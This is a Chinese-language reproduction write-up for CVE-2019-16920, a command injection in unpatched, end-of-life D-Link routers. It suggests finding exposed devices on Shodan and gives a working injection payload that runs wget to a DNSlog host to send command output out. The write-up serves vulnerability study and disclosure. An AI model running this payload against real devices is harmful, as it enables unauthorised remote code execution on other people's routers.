admin 管理员组文章数量: 887021
【CVE
目录
- 0x00 漏洞概述
- 0x01 影响版本
- 0x02 漏洞评级
- 0x03 shodan搜索漏洞环境
- 0x04 漏洞验证
- 0x05 修复建议
0x00 漏洞概述
友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。
2019年9月,Fortinet的FortiGuard Labs发现并向官方反馈了D-Link产品中存在的一个未授权命令注入漏洞(CVE-2019-16920),成功利用该漏洞后,攻击者可以在设备上实现远程代码执行(RCE)。由于攻击者无需通过身份认证就能远程触发该漏洞,因此该漏洞标记为高危级别漏洞。
0x01 影响版本
搭载最新版固件的如下D-Link产品存在该漏洞:
DIR-655
DIR-866L
DIR-652
DHP-1565
0x02 漏洞评级
高危
0x03 shodan搜索漏洞环境
使用shodan搜索"DIR-652"。(由于发现漏洞时,这些存在该漏洞的设备已经超出了服务周期,这意味着厂商不会再为发现的问题提供补丁。)
找到受影响版本的D-Link产品。
0x04 漏洞验证
输入用户名(这里使用 admin),密码为空,然后登陆并使用Burp抓包。
然后将POST请求的data部分修改为如下代码。(由于该命令执行结果无法回显到页面上,这里使用DNSlog把执行结果进行回显。其中t00ls.fa7b0b1880604***************dbe6.tu4为DNS服务器地址。)
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20http://`whoami`.t00ls.fa7b0b1880604***************dbe6.tu4
发送请求后,在DNSlog上发现命令执行结果,说明复现成功。
如需了解漏洞原理,建议参考此篇文章:
0x05 修复建议
由于发现漏洞时,这些存在该漏洞的设备已经超出了服务周期,这意味着厂商不会再为发现的问题提供补丁。所以建议D-Link用户升级到最新产品。
本文标签: CVE
版权声明:本文标题:【CVE 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/free/1699205931h336725.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论